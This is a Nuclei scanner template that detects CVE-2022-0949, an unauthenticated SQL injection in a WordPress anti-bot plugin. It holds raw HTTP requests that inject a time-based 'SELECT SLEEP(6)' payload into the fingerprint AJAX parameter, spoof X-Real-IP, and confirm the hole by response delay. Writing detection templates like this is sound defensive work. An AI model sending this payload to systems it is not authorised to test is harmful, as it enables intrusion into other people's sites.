nuclei-templates/cves/2022/CVE-2022-0949.yaml

57 lines
1.8 KiB
YAML
Raw Normal View History

2023-03-05 13:42:10 +00:00
id: CVE-2022-0949
info:
name: WP Block and Stop Bad Bots < 6.930 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection WordPress plugin before 6.930 does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users, leading to a SQL injection.
remediation: Fixed in version 6.930
reference:
- https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb
- https://wordpress.org/plugins/stopbadbots/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0949
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0949
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,stopbadbots,wp-plugin,wp,unauth,wpscan,cve2022,sqli,wordpress
2023-03-05 13:42:10 +00:00
variables:
IP: '{{rand_ip("1.1.1.0/24")}}'
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
X-Real-IP: {{IP}}
Content-Type: application/x-www-form-urlencoded
action=stopbadbots_grava_fingerprint&fingerprint=0
- |
@timeout 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
X-Real-IP: {{IP}}
Content-Type: application/x-www-form-urlencoded
action=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))
- |
GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'duration_2>=6'
- 'status_code_2 == 200'
- 'contains(body_3, "commentform")'
condition: and